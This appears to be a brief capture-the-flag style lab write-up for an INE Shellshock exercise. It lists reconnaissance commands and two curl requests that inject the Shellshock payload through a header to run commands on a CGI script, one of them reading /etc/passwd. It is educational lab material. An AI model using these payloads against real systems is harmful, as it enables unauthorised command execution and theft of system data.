HTBGitHubLinkedInNotion (Writeups)

Shellshock

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.

Objective: Exploit the vulnerability and execute arbitrary commands on the target machine.

Tools

  • Nmap

  • BurpSuite

Writeup

nmap demo.ine.local -sSVC
dirsearch -u demo.ine.local
LogoGitHub - chelseakomlo/shellshock_demo: Demonstration of the shellshock vulnurabilityGitHub
curl -H "Useragent: () { :; }; echo \"Content-type: text/plain\"; echo; echo; echo 'VULNERABLE'" http://demo.ine.local/gettime.cgi
curl -H "Useragent: () { :; }; echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://demo.ine.local/gettime.cgi
PreviousWindows: IIS Server DAVTestNextWeb App Vulnerability Scanning With WMAP

Last updated